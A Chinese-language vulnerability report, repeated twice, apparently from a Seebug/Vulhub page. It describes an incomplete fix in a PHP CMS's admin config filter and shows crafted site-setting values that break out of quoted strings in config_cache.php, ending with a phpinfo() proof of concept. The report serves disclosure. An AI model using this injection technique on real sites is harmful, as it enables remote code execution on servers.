VULHUB ™

### 简要描述： 这各漏洞子前被报过，但是厂商的修复不彻底。 ### 详细说明： admin/web_congif.php 的过滤代码如下。 ``` //强制去掉 ' //强制去掉最后一位 / $vartmp = str_replace("'",'',$row['varvalue']); if(substr($vartmp, -1) == '\\') { $vartmp = substr($vartmp,1,-1); } ``` 只过滤了最后一位的反斜杠，只需要加两个反斜杠就可以了····· 首先修改网站配置信息 [<img src="https://images.seebug.org/upload/201407/121646270a96d14c3768a1c07d7118338fe6b5f7.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/121646270a96d14c3768a1c07d7118338fe6b5f7.jpg) config_cache.php中会变成这样 ``` $cfg_webname = '的网站\'; $cfg_weburl = ';/*http://127.0.0.1'; $cfg_webpath = '*/phpinfo();#'; $cfg_author = ''; ``` php代码就会被执行了。 [<img src="https://images.seebug.org/upload/201407/12164859fd518a24f6c9241c7ae3dcb8f1d93d12.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/12164859fd518a24f6c9241c7ae3dcb8f1d93d12.jpg) ### 漏洞证明： 如上

### 简要描述： 这各漏洞子前被报过，但是厂商的修复不彻底。 ### 详细说明： admin/web_congif.php 的过滤代码如下。 ``` //强制去掉 ' //强制去掉最后一位 / $vartmp = str_replace("'",'',$row['varvalue']); if(substr($vartmp, -1) == '\\') { $vartmp = substr($vartmp,1,-1); } ``` 只过滤了最后一位的反斜杠，只需要加两个反斜杠就可以了····· 首先修改网站配置信息 [<img src="https://images.seebug.org/upload/201407/121646270a96d14c3768a1c07d7118338fe6b5f7.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/121646270a96d14c3768a1c07d7118338fe6b5f7.jpg) config_cache.php中会变成这样 ``` $cfg_webname = '的网站\'; $cfg_weburl = ';/*http://127.0.0.1'; $cfg_webpath = '*/phpinfo();#'; $cfg_author = ''; ``` php代码就会被执行了。 [<img src="https://images.seebug.org/upload/201407/12164859fd518a24f6c9241c7ae3dcb8f1d93d12.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/12164859fd518a24f6c9241c7ae3dcb8f1d93d12.jpg) ### 漏洞证明： 如上